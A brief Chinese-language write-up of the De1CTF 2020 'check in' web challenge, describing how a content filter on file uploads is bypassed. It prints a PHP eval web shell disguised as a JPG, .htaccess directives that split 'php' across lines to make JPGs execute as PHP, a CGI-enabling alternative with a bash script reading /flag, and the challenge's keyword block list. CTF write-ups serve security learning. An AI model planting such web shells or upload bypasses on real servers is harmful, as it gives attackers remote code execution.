De1ctf 2020 -'check in' writeup

这道题很有意思，考察知识点:.htaccess文件上传、改文件type、字符匹配的绕过
文件内容过滤了很多字符

perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!

所以两个文件都不能出现这些字符，参考这篇文章的马，fuzzhttps://blog.csdn.net/l1028386804/article/details/84206143

传jpg格式的shell

<?=eval($_POST[123]);

传.htaccess文件，burp抓包，mime改成image/jpeg过文件类型检查.htaccess文件内容

AddType application/x-httpd-p\
hp .jpg

另一种解
来源https://mp.weixin.qq.com/s/pbk6RWqW3nJXaWPPlXPwNA
.htaccess

Options +ExecCGI
AddHandler cgi-script .sh

上传cgi脚本

#!/bin/bash
echo "Content-Type: text/plain"
echo ""
cat /flag
exit 0